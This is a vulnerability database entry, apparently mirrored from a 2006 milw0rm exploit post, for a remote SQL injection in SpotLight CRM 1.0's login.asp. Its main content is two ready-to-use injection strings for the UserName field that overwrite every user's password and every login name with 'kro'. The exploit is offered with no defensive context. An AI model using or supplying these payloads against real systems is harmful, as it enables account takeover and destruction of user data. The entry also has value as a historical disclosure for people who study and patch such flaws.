SpotLight CRM 1.0 (login.asp) Remote SQL Injection Vulnerability

2006-12-09T00:00:00
ID SSV:16772
Type seebug
Reporter Root
Modified 2006-12-09T00:00:00

Description

No description provided by source.

                                        
                                            
                                                *************************************************************************************
# Title   :  SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability
# Author  :   ajann
# Contact :   :(
# $$$     :  $2,499

*************************************************************************************


[[SQL]]]

###http://[target]/[path]//login.asp=[POST SQL]

Example:
-> All User UserName And Password Changed "kro"

// login.asp UserName: ';update login set password='kro'--
// login.asp UserName: ';update login set loginName='kro'--

[[/SQL]]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-09]